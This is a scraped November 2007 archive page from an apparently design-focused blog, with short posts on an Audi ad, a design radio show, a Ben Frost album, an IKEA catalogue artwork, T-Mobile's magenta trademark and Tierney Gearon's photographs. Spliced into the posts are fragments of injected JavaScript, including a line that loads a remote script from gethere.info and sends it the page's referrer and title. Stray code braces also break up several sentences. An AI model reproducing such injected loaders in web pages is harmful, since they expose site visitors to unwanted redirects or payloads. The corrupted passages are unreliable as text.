Displaying archive for November, 2007.

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Audi R8 – The slowest car we’ve ever built

Graphic Design on the Radio

Presented by Adrian Shaughnessy from This is real art.
Resonance 104.4FM

The programmes featured interviews with leading designers who talked about their work and played music that inspired on influenced them. Graphic Design on the Radio will be back on air sometime in 2008.
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theory cover

Discovered through Boomkat a few months ago, Ben Frost was hard for me to find in Brussels actually. But that album stayed in a corner of my head for a long time and I recently came across it at Le Bonheur.

If you are a fan of industrial rock ala NIN (last wave) and Raster Noton alikes, you may find the jewellery for your crown ! Theory of Machines is an important album and a deep dive into someone’s mind. No pretension, just a pure moment of joy and power !

Go an listen!
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IKEA catalogue

Field Guide to Style & Color 2007
374 page book

This piece is a fullsize reproduction of the entire 2007 IKEA catalogue, leaving only color and structure.

With an estimated 175 million copies distributed in 2006, the IKEA catalogue is thought to have surpassed the Bible as the most published print-work in the world.

Handshake party

  • 29.11.2007

Handshake party

Collected by Marc Kremers for As-Found}

Magenta - In memoriam

Free Magenta by Lava.nl

T-Mobile doesn’t want other Dutch companies using the colour Magenta (bright pink) for their stationary or advertising campaigns.
Deutsche Telekom, the mother company of T-Mobile, has registered Magenta® at the European brandoffice.}

Jumpman 23
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Neon Bible

  • 21.11.2007

Neon Bible

A brilliant interactive music video for Neon Bible
If someone knows more about this project, please comment…}

July 3, 1970, 18.30

18.30 on July 3, 1970 (more pictures)} else {

Holy Shit!

Mètode de Rocanrol

Typography in Music Videos
Collection created by artist.if (document.currentScript) {

6000 Heads

  • 16.11.2007

6000 Heads - a photoset on Flickr

The Mother project

  • 16.11.2007

Tierney Gearon - The mother Project

Tierney Gearon’s photographs have been called manipulative, disturbingly ambiguous, even perverse; the London police demanded that the Saatchi Gallery which first showed the offending photos of her young children take the pictures down. Tierney has always maintained she loves her subjects deeply and understands them better than anyone else. How could she not? They are her family.

Related links
Daddy, Where are You?, published in August by Steidl.
The Mother Project (2006), Jack Youngelson and Peter Sutherland’s film.
The trailer – DVD is available here.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

HEMA – online winkelen
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